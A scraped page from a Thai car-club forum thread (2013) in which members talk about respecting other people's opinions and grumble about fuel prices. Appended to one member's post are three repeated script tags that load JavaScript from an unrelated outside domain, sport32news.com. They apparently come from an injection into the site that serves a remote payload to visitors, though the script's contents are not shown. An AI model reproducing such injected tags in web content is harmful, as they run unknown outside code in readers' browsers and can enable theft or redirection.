ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  POP_ES05  jagkrapongVilaikaew 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
พฤหัส, 7 มีนา 2013 08:55 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ค่อยๆคุยกันครับ สิ่งที่เรามองว่าถุกต้องหรือผิด อาจจะเป็นแค่มุมเดียวที่เรามองเห็น เราอาจจะรู้อีกอย่างในสิ่งที่เรารับรู้รับทราบมา แต่ปฏิเสธไม่ได้ว่าคนอื่นก็อาจจะรับข้อมูลมาอีกอย่าง วึ่งเราก็จำเป็นที่จะต้องรับฟังความคิดเห็นและให้เกียรติคนอื่นด้วยครับ
      ยกตัวอย่างง่ายๆครับสมมุติว่าเราอยู่กับเพื่อนอีกคน เพื่อนแม่งตด แต่มันอายกลัวเราไปพูดให้คนอื่นฟังว่ามันตด มันเลยชิงไปพูดให้คนอื่นฟังว่าเราตด
      เห็นมั๊ยครับว่าถ้าเราเป็นแค่คนรับข้อมูลแค่นี้เราก็ไม่มีทางได้รู้ความจริงแล้ว เพราะเราไม่ได้อยู่ในเหตุการณ์ ทีนี้มันก้ขึ้นอยู่กับวิจารณญานและอีกส่วนใจที่จะโอนเอนไปข้างไหนอีกด้วย ซึ่งอาจจะถูกหรือผิดก็ได้
     สิ่งที่เราทำได้ในการอยู่ร่วมกันคือเคารพในการแสดงความคิดเห็นของคนอื่นครับผม

ได้รับคำขอบคุณจาก: jagkrapongVilaikaew  POP_ES05  thammarong007  เดิมก็ดี  hacker  Sak_es5442 
nongnb

ชื่อเล่น: น้อง

เข้าร่วม: 04 ตุลา 2012
ตอบ: 356

ได้รับคำขอบคุณ: 347

พฤหัส, 7 มีนา 2013 08:56 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
3drom พิมพ์ว่า:

jagkrapongVilaikaew

ชื่อเล่น: โจ

เข้าร่วม: 09 มกรา 2011
ตอบ: 716

Guru ES
Guru ES

ได้รับคำขอบคุณ: 709
ให้คำขอบคุณ: 1961

พฤหัส, 7 มีนา 2013 09:35 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
ขอขอบคุณทุก ๆ ความคิดเห็นครับ  สุดแท้แต่พิจารณญาญ ของท่านทั้งหลายครับ
ซึ่งเลย.  เอาเป็นว่าคนไทย และพี่น้อง ES รักกันก็คงพอแล้วเนาะครับผม.."<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: akawut  POP_ES05  LnwwasaD  es330 
Mundo

ชื่อเล่น: ธี

เข้าร่วม: 02 พฤษภาคม 2012
ตอบ: 881

Guru ES
Guru ES

ได้รับคำขอบคุณ: 720
ให้คำขอบคุณ: 490

พฤหัส, 7 มีนา 2013 10:56 - พี่ ๆ น้อง ลุงป้้าน้าอา เห็นว่าอย่างไรครบผม
เอาจริงๆ นะ ผมปลงแล้วกับเรื่องงราคาน้ำมัน เพราะยังไงทั้งชีวิตผมก็อยู่ที่ประเทศไทย ยังไงผมก็ต้องรับมันให้ได้ 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  jagkrapongVilaikaew  ninenine  natt-es3 
ตอบ
หน้า 1 จาก 6
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.